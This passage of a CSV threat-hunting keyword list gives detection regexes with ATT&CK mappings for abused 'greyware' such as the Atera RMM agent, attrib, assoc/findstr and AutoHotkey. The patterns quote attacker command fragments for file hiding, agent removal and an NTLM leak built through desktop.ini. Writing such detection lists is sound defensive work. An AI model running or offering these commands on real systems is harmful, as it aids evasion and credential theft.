TA0002","N/A","N/A","Reconnaissance","N/A","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*assoc *findstr *mdf*",".{0,1000}assoc\s.{0,1000}findstr\s.{0,1000}mdf.{0,1000}","greyware_tool_keyword","assoc","will return the file association for file extensions that include the string mdf - hidden objective is to find cmdfile association","T1033 - T1059 - T1083","TA0007 - TA0002","N/A","N/A","Reconnaissance","N/A","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*assoc *findstr *s1x*",".{0,1000}assoc\s.{0,1000}findstr\s.{0,1000}s1x.{0,1000}","greyware_tool_keyword","assoc","will return the file association for file extensions that include the string s1x - hidden objective is to find .ps1xml association","T1033 - T1059 - T1083","TA0007 - TA0002","N/A","N/A","Reconnaissance","N/A","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*assoc *findstr =cm*",".{0,1000}assoc\s.{0,1000}findstr\s\=cm.{0,1000}","greyware_tool_keyword","assoc","will return the file association for file extensions that include the string =cm - hidden objective is to find .cdxml association","T1033 - T1059 - T1083","TA0007 - TA0002","N/A","N/A","Reconnaissance","N/A","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*assoc *findstr lCmd*",".{0,1000}assoc\s.{0,1000}findstr\slCmd.{0,1000}","greyware_tool_keyword","assoc","will return the file association for file extensions that include the string lCmd - hidden objective is to find .cdxml association","T1033 - T1059 - T1083","TA0007 - TA0002","N/A","N/A","Reconnaissance","N/A","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*assoc *findstr mdf*",".{0,1000}assoc\s.{0,1000}findstr\smdf.{0,1000}","greyware_tool_keyword","assoc","will return the file association for file extensions that include the string mdf - hidden objective is to find cmdfile association","T1033 - T1059 - T1083","TA0007 - TA0002","N/A","N/A","Reconnaissance","N/A","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*assoc *findstr 
s1x*",".{0,1000}assoc\s.{0,1000}findstr\ss1x.{0,1000}","greyware_tool_keyword","assoc","will return the file association for file extensions that include the string s1x - hidden objective is to find .ps1xml association","T1033 - T1059 - T1083","TA0007 - TA0002","N/A","N/A","Reconnaissance","N/A","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*jajilbjjinjmgcibalaakngmkilboobh*",".{0,1000}jajilbjjinjmgcibalaakngmkilboobh.{0,1000}","greyware_tool_keyword","Astar VPN","External VPN usage within corporate network","T1090.003 - T1133 - T1572","TA0003 - TA0001 - TA0011 - TA0010 - TA0005","N/A","N/A","Data Exfiltration","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml","1","0","N/A","detection in registry","8","10","N/A","N/A","N/A","N/A" "*/Agent/AcknowledgeCommands/*",".{0,1000}\/Agent\/AcknowledgeCommands\/.{0,1000}","greyware_tool_keyword","Atera","control remote machines- abused by threat actors","T1021.001 - T1078 - T1133 - T1112","TA0008 - TA0003 - TA0004 - TA0005 - TA0011 - TA0010","N/A","BlackSuit - Royal - AvosLocker - BianLian - Conti - Hive - Quantum - RansomHub - Black Basta","RMM","https://www.atera.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*/Agent/GetCommandsFallback/*",".{0,1000}\/Agent\/GetCommandsFallback\/.{0,1000}","greyware_tool_keyword","Atera","control remote machines- abused by threat actors","T1021.001 - T1078 - T1133 - T1112","TA0008 - TA0003 - TA0004 - TA0005 - TA0011 - TA0010","N/A","BlackSuit - Royal - AvosLocker - BianLian - Conti - Hive - Quantum - RansomHub - Black Basta","RMM","https://www.atera.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*/Agent/GetEnvironmentStatus/*",".{0,1000}\/Agent\/GetEnvironmentStatus\/.{0,1000}","greyware_tool_keyword","Atera","control remote machines- abused by threat actors","T1021.001 - T1078 - T1133 - T1112","TA0008 - TA0003 - TA0004 - TA0005 - TA0011 - 
TA0010","N/A","BlackSuit - Royal - AvosLocker - BianLian - Conti - Hive - Quantum - RansomHub - Black Basta","RMM","https://www.atera.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*/Agent/GetRecurringPackages/*",".{0,1000}\/Agent\/GetRecurringPackages\/.{0,1000}","greyware_tool_keyword","Atera","control remote machines- abused by threat actors","T1021.001 - T1078 - T1133 - T1112","TA0008 - TA0003 - TA0004 - TA0005 - TA0011 - TA0010","N/A","BlackSuit - Royal - AvosLocker - BianLian - Conti - Hive - Quantum - RansomHub - Black Basta","RMM","https://www.atera.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\AlphaControlAgent\obj\Release\AteraAgent.pdb*",".{0,1000}\\AlphaControlAgent\\obj\\Release\\AteraAgent\.pdb.{0,1000}","greyware_tool_keyword","Atera","control remote machines- abused by threat actors","T1021.001 - T1078 - T1133 - T1112","TA0008 - TA0003 - TA0004 - TA0005 - TA0011 - TA0010","N/A","BlackSuit - Royal - AvosLocker - BianLian - Conti - Hive - Quantum - RansomHub - Black Basta","RMM","https://www.atera.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\atera_agent.exe*",".{0,1000}\\atera_agent\.exe.{0,1000}","greyware_tool_keyword","Atera","control remote machines- abused by threat actors","T1021.001 - T1078 - T1133 - T1112","TA0008 - TA0003 - TA0004 - TA0005 - TA0011 - TA0010","N/A","BlackSuit - Royal - AvosLocker - BianLian - Conti - Hive - Quantum - RansomHub - Black Basta","RMM","https://www.atera.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\Program Files (x86)\Atera Networks*",".{0,1000}\\Program\sFiles\s\(x86\)\\Atera\sNetworks.{0,1000}","greyware_tool_keyword","Atera","control remote machines- abused by threat actors","T1021.001 - T1078 - T1133 - T1112","TA0008 - TA0003 - TA0004 - TA0005 - TA0011 - TA0010","N/A","BlackSuit - Royal - AvosLocker - BianLian - Conti - Hive - Quantum - RansomHub - Black Basta","RMM","https://www.atera.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" 
"*\Program Files\Atera Networks*",".{0,1000}\\Program\sFiles\\Atera\sNetworks.{0,1000}","greyware_tool_keyword","Atera","control remote machines- abused by threat actors","T1021.001 - T1078 - T1133 - T1112","TA0008 - TA0003 - TA0004 - TA0005 - TA0011 - TA0010","N/A","BlackSuit - Royal - AvosLocker - BianLian - Conti - Hive - Quantum - RansomHub - Black Basta","RMM","https://www.atera.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\Services\AteraAgent*",".{0,1000}\\Services\\AteraAgent.{0,1000}","greyware_tool_keyword","Atera","control remote machines- abused by threat actors","T1021.001 - T1078 - T1133 - T1112","TA0008 - TA0003 - TA0004 - TA0005 - TA0011 - TA0010","N/A","BlackSuit - Royal - AvosLocker - BianLian - Conti - Hive - Quantum - RansomHub - Black Basta","RMM","https://www.atera.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\TEMP\AteraUpgradeAgentPackage\*",".{0,1000}\\TEMP\\AteraUpgradeAgentPackage\\.{0,1000}","greyware_tool_keyword","Atera","control remote machines- abused by threat actors","T1021.001 - T1078 - T1133 - T1112","TA0008 - TA0003 - TA0004 - TA0005 - TA0011 - TA0010","N/A","BlackSuit - Royal - AvosLocker - BianLian - Conti - Hive - Quantum - RansomHub - Black Basta","RMM","https://www.atera.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*>Atera Networks<*",".{0,1000}\>Atera\sNetworks\<.{0,1000}","greyware_tool_keyword","Atera","control remote machines- abused by threat actors","T1021.001 - T1078 - T1133 - T1112","TA0008 - TA0003 - TA0004 - TA0005 - TA0011 - TA0010","N/A","BlackSuit - Royal - AvosLocker - BianLian - Conti - Hive - Quantum - RansomHub - Black Basta","RMM","https://www.atera.com/","1","0","#companyname","N/A","10","10","N/A","N/A","N/A","N/A" "*acontrol.atera.com*",".{0,1000}acontrol\.atera\.com.{0,1000}","greyware_tool_keyword","Atera","control remote machines- abused by threat actors","T1021.001 - T1078 - T1133 - T1112","TA0008 - TA0003 - TA0004 - TA0005 - TA0011 - 
TA0010","N/A","BlackSuit - Royal - AvosLocker - BianLian - Conti - Hive - Quantum - RansomHub - Black Basta","RMM","https://www.atera.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*agent-api.atera.com*",".{0,1000}agent\-api\.atera\.com.{0,1000}","greyware_tool_keyword","Atera","control remote machines- abused by threat actors","T1021.001 - T1078 - T1133 - T1112","TA0008 - TA0003 - TA0004 - TA0005 - TA0011 - TA0010","N/A","BlackSuit - Royal - AvosLocker - BianLian - Conti - Hive - Quantum - RansomHub - Black Basta","RMM","https://www.atera.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*AgentPackageInternalPooler\log.txt*",".{0,1000}AgentPackageInternalPooler\\log\.txt.{0,1000}","greyware_tool_keyword","Atera","control remote machines- abused by threat actors","T1021.001 - T1078 - T1133 - T1112","TA0008 - TA0003 - TA0004 - TA0005 - TA0011 - TA0010","N/A","BlackSuit - Royal - AvosLocker - BianLian - Conti - Hive - Quantum - RansomHub - Black Basta","RMM","https://www.atera.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*AgentPackageRunCommandInteractive\log.txt*",".{0,1000}AgentPackageRunCommandInteractive\\log\.txt.{0,1000}","greyware_tool_keyword","Atera","control remote machines- abused by threat actors","T1021.001 - T1078 - T1133 - T1112","TA0008 - TA0003 - TA0004 - TA0005 - TA0011 - TA0010","N/A","BlackSuit - Royal - AvosLocker - BianLian - Conti - Hive - Quantum - RansomHub - Black Basta","RMM","https://www.atera.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*AlphaControlAgent.CloudLogsManager+<>*",".{0,1000}AlphaControlAgent\.CloudLogsManager\+\<\>.{0,1000}","greyware_tool_keyword","Atera","control remote machines- abused by threat actors","T1021.001 - T1078 - T1133 - T1112","TA0008 - TA0003 - TA0004 - TA0005 - TA0011 - TA0010","N/A","BlackSuit - Royal - AvosLocker - BianLian - Conti - Hive - Quantum - RansomHub - Black 
Basta","RMM","https://www.atera.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*atera_del.bat*",".{0,1000}atera_del\.bat.{0,1000}","greyware_tool_keyword","Atera","control remote machines- abused by threat actors","T1021.001 - T1078 - T1133 - T1112","TA0008 - TA0003 - TA0004 - TA0005 - TA0011 - TA0010","N/A","BlackSuit - Royal - AvosLocker - BianLian - Conti - Hive - Quantum - RansomHub - Black Basta","RMM","https://www.atera.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*atera_del2.bat*",".{0,1000}atera_del2\.bat.{0,1000}","greyware_tool_keyword","Atera","control remote machines- abused by threat actors","T1021.001 - T1078 - T1133 - T1112","TA0008 - TA0003 - TA0004 - TA0005 - TA0011 - TA0010","N/A","BlackSuit - Royal - AvosLocker - BianLian - Conti - Hive - Quantum - RansomHub - Black Basta","RMM","https://www.atera.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*AteraAgent*AgentPackageRunCommandInteractive.exe*",".{0,1000}AteraAgent.{0,1000}AgentPackageRunCommandInteractive\.exe.{0,1000}","greyware_tool_keyword","Atera","control remote machines- abused by threat actors","T1021.001 - T1078 - T1133 - T1112","TA0008 - TA0003 - TA0004 - TA0005 - TA0011 - TA0010","N/A","BlackSuit - Royal - AvosLocker - BianLian - Conti - Hive - Quantum - RansomHub - Black Basta","RMM","https://thedfirreport.com/2023/09/25/from-screenconnect-to-hive-ransomware-in-61-hours/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*AteraSetupLog.txt*",".{0,1000}AteraSetupLog\.txt.{0,1000}","greyware_tool_keyword","Atera","control remote machines- abused by threat actors","T1021.001 - T1078 - T1133 - T1112","TA0008 - TA0003 - TA0004 - TA0005 - TA0011 - TA0010","N/A","BlackSuit - Royal - AvosLocker - BianLian - Conti - Hive - Quantum - RansomHub - Black Basta","RMM","https://www.atera.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*HKEY_CURRENT_USER\Software\ATERA 
Networks*",".{0,1000}HKEY_CURRENT_USER\\Software\\ATERA\sNetworks.{0,1000}","greyware_tool_keyword","Atera","control remote machines- abused by threat actors","T1021.001 - T1078 - T1133 - T1112","TA0008 - TA0003 - TA0004 - TA0005 - TA0011 - TA0010","N/A","BlackSuit - Royal - AvosLocker - BianLian - Conti - Hive - Quantum - RansomHub - Black Basta","RMM","https://www.atera.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*HKEY_LOCAL_MACHINE\SOFTWARE\ATERA Networks*",".{0,1000}HKEY_LOCAL_MACHINE\\SOFTWARE\\ATERA\sNetworks.{0,1000}","greyware_tool_keyword","Atera","control remote machines- abused by threat actors","T1021.001 - T1078 - T1133 - T1112","TA0008 - TA0003 - TA0004 - TA0005 - TA0011 - TA0010","N/A","BlackSuit - Royal - AvosLocker - BianLian - Conti - Hive - Quantum - RansomHub - Black Basta","RMM","https://www.atera.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*http*/agent-api-*.atera.com*",".{0,1000}http.{0,1000}\/agent\-api\-.{0,1000}\.atera\.com.{0,1000}","greyware_tool_keyword","Atera","control remote machines- abused by threat actors","T1021.001 - T1078 - T1133 - T1112","TA0008 - TA0003 - TA0004 - TA0005 - TA0011 - TA0010","N/A","BlackSuit - Royal - AvosLocker - BianLian - Conti - Hive - Quantum - RansomHub - Black Basta","RMM","https://www.atera.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*Monitoring & Management Agent by ATERA*",".{0,1000}Monitoring\s\&\sManagement\sAgent\sby\sATERA.{0,1000}","greyware_tool_keyword","Atera","control remote machines- abused by threat actors","T1021.001 - T1078 - T1133 - T1112","TA0008 - TA0003 - TA0004 - TA0005 - TA0011 - TA0010","N/A","BlackSuit - Royal - AvosLocker - BianLian - Conti - Hive - Quantum - RansomHub - Black Basta","RMM","https://www.atera.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*REG DELETE ""HKEY_CLASSES_ROOT\Installer\Products\10F15BFE50893924BB61F671FEC4D2EF"" 
/f*",".{0,1000}REG\sDELETE\s\""HKEY_CLASSES_ROOT\\Installer\\Products\\10F15BFE50893924BB61F671FEC4D2EF\""\s\/f.{0,1000}","greyware_tool_keyword","Atera","control remote machines- abused by threat actors","T1021.001 - T1078 - T1133 - T1112","TA0008 - TA0003 - TA0004 - TA0005 - TA0011 - TA0010","N/A","BlackSuit - Royal - AvosLocker - BianLian - Conti - Hive - Quantum - RansomHub - Black Basta","RMM","https://thedfirreport.com/2024/08/12/threat-actors-toolkit-leveraging-sliver-poshc2-batch-scripts/#c01","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*REG DELETE ""HKEY_CLASSES_ROOT\Installer\Products\4758948C95C1B194AB15204D95B42292"" /f*",".{0,1000}REG\sDELETE\s\""HKEY_CLASSES_ROOT\\Installer\\Products\\4758948C95C1B194AB15204D95B42292\""\s\/f.{0,1000}","greyware_tool_keyword","Atera","control remote machines- abused by threat actors","T1021.001 - T1078 - T1133 - T1112","TA0008 - TA0003 - TA0004 - TA0005 - TA0011 - TA0010","N/A","BlackSuit - Royal - AvosLocker - BianLian - Conti - Hive - Quantum - RansomHub - Black Basta","RMM","https://thedfirreport.com/2024/08/12/threat-actors-toolkit-leveraging-sliver-poshc2-batch-scripts/#c01","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*sc delete AteraAgent*",".{0,1000}sc\sdelete\sAteraAgent.{0,1000}","greyware_tool_keyword","Atera","control remote machines- abused by threat actors","T1021.001 - T1078 - T1133 - T1112","TA0008 - TA0003 - TA0004 - TA0005 - TA0011 - TA0010","N/A","BlackSuit - Royal - AvosLocker - BianLian - Conti - Hive - Quantum - RansomHub - Black Basta","RMM","https://www.atera.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*sc start AteraAgent*",".{0,1000}sc\sstart\sAteraAgent.{0,1000}","greyware_tool_keyword","Atera","control remote machines- abused by threat actors","T1021.001 - T1078 - T1133 - T1112","TA0008 - TA0003 - TA0004 - TA0005 - TA0011 - TA0010","N/A","BlackSuit - Royal - AvosLocker - BianLian - Conti - Hive - Quantum - RansomHub - Black 
Basta","RMM","https://www.atera.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*sc stop AteraAgent*",".{0,1000}sc\sstop\sAteraAgent.{0,1000}","greyware_tool_keyword","Atera","control remote machines- abused by threat actors","T1021.001 - T1078 - T1133 - T1112","TA0008 - TA0003 - TA0004 - TA0005 - TA0011 - TA0010","N/A","BlackSuit - Royal - AvosLocker - BianLian - Conti - Hive - Quantum - RansomHub - Black Basta","RMM","https://www.atera.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*SOFTWARE\ATERA Networks\AlphaAgent*",".{0,1000}SOFTWARE\\ATERA\sNetworks\\AlphaAgent.{0,1000}","greyware_tool_keyword","Atera","control remote machines- abused by threat actors","T1021.001 - T1078 - T1133 - T1112","TA0008 - TA0003 - TA0004 - TA0005 - TA0011 - TA0010","N/A","BlackSuit - Royal - AvosLocker - BianLian - Conti - Hive - Quantum - RansomHub - Black Basta","RMM","https://www.atera.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*taskkill /f /im AgentPackageAgentInformation.exe*",".{0,1000}taskkill\s\/f\s\/im\sAgentPackageAgentInformation\.exe.{0,1000}","greyware_tool_keyword","Atera","control remote machines- abused by threat actors","T1021.001 - T1078 - T1133 - T1112","TA0008 - TA0003 - TA0004 - TA0005 - TA0011 - TA0010","N/A","BlackSuit - Royal - AvosLocker - BianLian - Conti - Hive - Quantum - RansomHub - Black Basta","RMM","https://www.atera.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*taskkill /f /im AgentPackageEventViewer.exe*",".{0,1000}taskkill\s\/f\s\/im\sAgentPackageEventViewer\.exe.{0,1000}","greyware_tool_keyword","Atera","control remote machines- abused by threat actors","T1021.001 - T1078 - T1133 - T1112","TA0008 - TA0003 - TA0004 - TA0005 - TA0011 - TA0010","N/A","BlackSuit - Royal - AvosLocker - BianLian - Conti - Hive - Quantum - RansomHub - Black Basta","RMM","https://www.atera.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*taskkill /f /im 
AgentPackageHeartbeat.exe*",".{0,1000}taskkill\s\/f\s\/im\sAgentPackageHeartbeat\.exe.{0,1000}","greyware_tool_keyword","Atera","control remote machines- abused by threat actors","T1021.001 - T1078 - T1133 - T1112","TA0008 - TA0003 - TA0004 - TA0005 - TA0011 - TA0010","N/A","BlackSuit - Royal - AvosLocker - BianLian - Conti - Hive - Quantum - RansomHub - Black Basta","RMM","https://www.atera.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*taskkill /f /im AgentPackageInformation*",".{0,1000}taskkill\s\/f\s\/im\sAgentPackageInformation.{0,1000}","greyware_tool_keyword","Atera","control remote machines- abused by threat actors","T1021.001 - T1078 - T1133 - T1112","TA0008 - TA0003 - TA0004 - TA0005 - TA0011 - TA0010","N/A","BlackSuit - Royal - AvosLocker - BianLian - Conti - Hive - Quantum - RansomHub - Black Basta","RMM","https://www.atera.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*taskkill /f /im AgentPackageInternalPoller.exe*",".{0,1000}taskkill\s\/f\s\/im\sAgentPackageInternalPoller\.exe.{0,1000}","greyware_tool_keyword","Atera","control remote machines- abused by threat actors","T1021.001 - T1078 - T1133 - T1112","TA0008 - TA0003 - TA0004 - TA0005 - TA0011 - TA0010","N/A","BlackSuit - Royal - AvosLocker - BianLian - Conti - Hive - Quantum - RansomHub - Black Basta","RMM","https://www.atera.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*taskkill /f /im AgentPackageMonitoring*",".{0,1000}taskkill\s\/f\s\/im\sAgentPackageMonitoring.{0,1000}","greyware_tool_keyword","Atera","control remote machines- abused by threat actors","T1021.001 - T1078 - T1133 - T1112","TA0008 - TA0003 - TA0004 - TA0005 - TA0011 - TA0010","N/A","BlackSuit - Royal - AvosLocker - BianLian - Conti - Hive - Quantum - RansomHub - Black Basta","RMM","https://www.atera.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*taskkill /f /im 
AgentPackageProgramManagement*",".{0,1000}taskkill\s\/f\s\/im\sAgentPackageProgramManagement.{0,1000}","greyware_tool_keyword","Atera","control remote machines- abused by threat actors","T1021.001 - T1078 - T1133 - T1112","TA0008 - TA0003 - TA0004 - TA0005 - TA0011 - TA0010","N/A","BlackSuit - Royal - AvosLocker - BianLian - Conti - Hive - Quantum - RansomHub - Black Basta","RMM","https://www.atera.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*taskkill /f /im AgentPackageRegistryExplorer.exe*",".{0,1000}taskkill\s\/f\s\/im\sAgentPackageRegistryExplorer\.exe.{0,1000}","greyware_tool_keyword","Atera","control remote machines- abused by threat actors","T1021.001 - T1078 - T1133 - T1112","TA0008 - TA0003 - TA0004 - TA0005 - TA0011 - TA0010","N/A","BlackSuit - Royal - AvosLocker - BianLian - Conti - Hive - Quantum - RansomHub - Black Basta","RMM","https://www.atera.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*taskkill /f /im AgentPackageRunCommande.exe*",".{0,1000}taskkill\s\/f\s\/im\sAgentPackageRunCommande\.exe.{0,1000}","greyware_tool_keyword","Atera","control remote machines- abused by threat actors","T1021.001 - T1078 - T1133 - T1112","TA0008 - TA0003 - TA0004 - TA0005 - TA0011 - TA0010","N/A","BlackSuit - Royal - AvosLocker - BianLian - Conti - Hive - Quantum - RansomHub - Black Basta","RMM","https://www.atera.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*taskkill /f /im AgentPackageRunCommandInteractive*",".{0,1000}taskkill\s\/f\s\/im\sAgentPackageRunCommandInteractive.{0,1000}","greyware_tool_keyword","Atera","control remote machines- abused by threat actors","T1021.001 - T1078 - T1133 - T1112","TA0008 - TA0003 - TA0004 - TA0005 - TA0011 - TA0010","N/A","BlackSuit - Royal - AvosLocker - BianLian - Conti - Hive - Quantum - RansomHub - Black Basta","RMM","https://www.atera.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*taskkill /f /im 
AgentPackageSTRemote.exe*",".{0,1000}taskkill\s\/f\s\/im\sAgentPackageSTRemote\.exe.{0,1000}","greyware_tool_keyword","Atera","control remote machines- abused by threat actors","T1021.001 - T1078 - T1133 - T1112","TA0008 - TA0003 - TA0004 - TA0005 - TA0011 - TA0010","N/A","BlackSuit - Royal - AvosLocker - BianLian - Conti - Hive - Quantum - RansomHub - Black Basta","RMM","https://www.atera.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*taskkill /f /im AgentPackageSystemTools.exe*",".{0,1000}taskkill\s\/f\s\/im\sAgentPackageSystemTools\.exe.{0,1000}","greyware_tool_keyword","Atera","control remote machines- abused by threat actors","T1021.001 - T1078 - T1133 - T1112","TA0008 - TA0003 - TA0004 - TA0005 - TA0011 - TA0010","N/A","BlackSuit - Royal - AvosLocker - BianLian - Conti - Hive - Quantum - RansomHub - Black Basta","RMM","https://www.atera.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*taskkill /f /im AgentPackageUpgradeAgent*",".{0,1000}taskkill\s\/f\s\/im\sAgentPackageUpgradeAgent.{0,1000}","greyware_tool_keyword","Atera","control remote machines- abused by threat actors","T1021.001 - T1078 - T1133 - T1112","TA0008 - TA0003 - TA0004 - TA0005 - TA0011 - TA0010","N/A","BlackSuit - Royal - AvosLocker - BianLian - Conti - Hive - Quantum - RansomHub - Black Basta","RMM","https://www.atera.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*taskkill /f /im AgentPackageWindowsUpdate.exe*",".{0,1000}taskkill\s\/f\s\/im\sAgentPackageWindowsUpdate\.exe.{0,1000}","greyware_tool_keyword","Atera","control remote machines- abused by threat actors","T1021.001 - T1078 - T1133 - T1112","TA0008 - TA0003 - TA0004 - TA0005 - TA0011 - TA0010","N/A","BlackSuit - Royal - AvosLocker - BianLian - Conti - Hive - Quantum - RansomHub - Black Basta","RMM","https://www.atera.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*taskkill /f /im 
AteraAgent.exe*",".{0,1000}taskkill\s\/f\s\/im\sAteraAgent\.exe.{0,1000}","greyware_tool_keyword","Atera","control remote machines- abused by threat actors","T1021.001 - T1078 - T1133 - T1112","TA0008 - TA0003 - TA0004 - TA0005 - TA0011 - TA0010","N/A","BlackSuit - Royal - AvosLocker - BianLian - Conti - Hive - Quantum - RansomHub - Black Basta","RMM","https://www.atera.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*taskkill /f /im TicketingTray.exe*",".{0,1000}taskkill\s\/f\s\/im\sTicketingTray\.exe.{0,1000}","greyware_tool_keyword","Atera","control remote machines- abused by threat actors","T1021.001 - T1078 - T1133 - T1112","TA0008 - TA0003 - TA0004 - TA0005 - TA0011 - TA0010","N/A","BlackSuit - Royal - AvosLocker - BianLian - Conti - Hive - Quantum - RansomHub - Black Basta","RMM","https://www.atera.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\attrib.exe* +H *",".{0,1000}\\attrib\.exe.{0,1000}\s\+H\s.{0,1000}","greyware_tool_keyword","attrib","command aiming to hide a file. 
It can be performed with attrib.exe on a WINDOWS machine with command option +h ","T1562.001","TA0040 - TA0002","N/A","N/A","Defense Evasion","N/A","1","0","N/A","greyware tool - risks of False positive !","2","8","N/A","N/A","N/A","N/A" "*attrib *.rdp -s -h",".{0,1000}attrib\s.{0,1000}\.rdp\s\-s\s\-h","greyware_tool_keyword","attrib","hide evidence of RDP connections","T1070.004","TA0005","N/A","N/A","Defense Evasion","https://github.com/xiaoy-sec/Pentest_Note/blob/52156f816f0c2497c25343c2e872130193acca80/wiki/%E6%9D%83%E9%99%90%E6%8F%90%E5%8D%87/Windows%E6%8F%90%E6%9D%83/RDP%26Firewall/%E5%88%A0%E9%99%A4%E7%97%95%E8%BF%B9.md?plain=1#L4","1","0","N/A","N/A","10","10","3635","918","2023-05-22T03:50:57Z","2020-06-15T02:58:36Z" "*attrib +s +h /D ""C:\Program Files\Windows NT\*",".{0,1000}attrib\s\+s\s\+h\s\/D\s\""C\:\\Program\sFiles\\Windows\sNT\\.{0,1000}","greyware_tool_keyword","attrib","defense evasion - hiding in suspicious directory","T1564.001","TA0005","N/A","N/A","Defense Evasion","N/A","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*attrib +s +h /D ""C:\users\Public\*",".{0,1000}attrib\s\+s\s\+h\s\/D\s\""C\:\\users\\Public\\.{0,1000}","greyware_tool_keyword","attrib","defense evasion - hiding in suspicious directory","T1564.001","TA0005","N/A","N/A","Defense Evasion","N/A","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*attrib +s +h desktop.ini*",".{0,1000}attrib\s\+s\s\+h\sdesktop\.ini.{0,1000}","greyware_tool_keyword","attrib","NTLM Leak via Desktop.ini","T1564.001","TA0005","N/A","N/A","Credential Access","https://github.com/RoseSecurity/Red-Teaming-TTPs/blob/main/Anti-Forensics.md","1","0","N/A","N/A","N/A","10","1237","155","2024-08-26T19:30:51Z","2021-08-16T17:34:25Z" "*echo [.ShellClassInfo] > desktop.ini*",".{0,1000}echo\s\[\.ShellClassInfo\]\s\>\sdesktop\.ini.{0,1000}","greyware_tool_keyword","attrib","NTLM Leak via Desktop.ini","T1555.003 - T1081.001","TA0006 - TA0007","N/A","N/A","Credential 
Access","https://github.com/RoseSecurity/Red-Teaming-TTPs/blob/main/Anti-Forensics.md","1","0","N/A","N/A","N/A","10","1237","155","2024-08-26T19:30:51Z","2021-08-16T17:34:25Z" "*echo IconResource=\\*\* >> desktop.ini*",".{0,1000}echo\sIconResource\=\\\\.{0,1000}\\.{0,1000}\s\>\>\sdesktop\.ini.{0,1000}","greyware_tool_keyword","attrib","NTLM Leak via Desktop.ini","T1555.003 - T1081.001","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/RoseSecurity/Red-Teaming-TTPs/blob/main/Anti-Forensics.md","1","0","N/A","N/A","N/A","10","1237","155","2024-08-26T19:30:51Z","2021-08-16T17:34:25Z" "*/AutoHotkey.exe*",".{0,1000}\/AutoHotkey\.exe.{0,1000}","greyware_tool_keyword","AutoHotkey","AutoHotkey - macro-creation and automation-oriented scripting utility for Windows","T1056.001 - T1027 - T1059.001 - T1140","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/AutoHotkey/AutoHotkey","1","1","N/A","abused by multiple threat actors https://thehackernews.com/2024/06/darkgate-malware-replaces-autoit-with.html - False positives expected","6","10","8948","925","2024-07-06T14:02:52Z","2009-11-25T11:08:21Z" "*/AutoHotkey.git*",".{0,1000}\/AutoHotkey\.git.{0,1000}","greyware_tool_keyword","AutoHotkey","AutoHotkey - macro-creation and automation-oriented scripting utility for Windows","T1056.001 - T1027 - T1059.001 - T1140","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/AutoHotkey/AutoHotkey","1","1","N/A","abused by multiple threat actors https://thehackernews.com/2024/06/darkgate-malware-replaces-autoit-with.html - False positives expected","6","10","8948","925","2024-07-06T14:02:52Z","2009-11-25T11:08:21Z" 